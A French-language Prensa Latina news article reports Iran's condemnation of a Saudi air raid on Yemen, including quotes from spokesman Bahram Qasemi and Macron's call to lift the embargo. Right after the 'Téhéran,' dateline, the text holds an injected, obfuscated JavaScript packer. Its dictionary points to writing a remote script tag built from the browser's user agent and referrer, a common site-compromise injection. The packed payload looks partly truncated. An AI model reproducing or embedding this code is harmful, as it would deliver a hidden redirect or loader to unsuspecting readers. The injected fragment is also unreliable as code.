lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L´Iran condamne les raids aériens saoudiens contre le Yémen

Téhéran, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yzsys|var|u0026u|referrer|kfadf||js|php'.split('|'),0,{})) 27 décembre (Prensa Latina) Le gouvernement iranien a aujourd´hui condamné un récent raid aérien saoudien contre le Yémen qui a fait un bilan de 23 civils tués.

Téhéran, 27 décembre (Prensa Latina) Le gouvernement iranien a aujourd´hui condamné un récent raid aérien saoudien contre le Yémen qui a fait un bilan de 23 civils tués.

Une déclaration du porte-parole de la chancellerie, Bahram Qasemi, exige la fin immédiate de ces bombardements.

« Chaque fois que l´Arabie Saoudite souffre une défaite au Yémen, elle bombarde en vengeance des zones de résidence de civils, tuant des personnes âgées, des femmes et des enfants », a-t-il indiqué.

La déclaration déplore également « la complicité de la communauté internationale qui fait la sourde oreille et ferme les yeux sur ces attaques saoudiennes, exécutées avec des armes fournies par les États-Unis ».

« Depuis mars 2015, le peuple yéménite est victime d´une guerre cruelle lancée par le royaume saoudien et une coalition de pays du Golfe, et cela sans aucun aval de l´ONU », indique le document.

Le porte-parole de la chancellerie perse juge que « cette campagne mortelle cherche à restaurer l´ex-président yéménite, et fugitif, Abdu Rabu Mansur Hadi au pouvoir ».

Des organisations humanitaires ont dénoncé le fait que l´offensive militaire de la coalition dirigée par l´Arabie Saoudite a provoqué la mort de plus de 12 mille personnes, et a détruit une grande partie des infrastructures de ce pays appauvri, y compris des hôpitaux, des écoles et des usines.

D´autre part, et selon le Palais de l´Élysée, le président français, Emmanuel Macron, a aujourd´hui appelé le roi d´Arabie Saoudite, Salman bin Abdulaziz, a mettre fin à l´embargo imposé contre le Yémen.

Macron a exhorté son interlocuteur à « entièrement lever cet embargo pour permettre l´entrée au Yémen de l´aide humanitaire et de biens commerciaux ».

peo/arc

EN CONTINU
notes connexes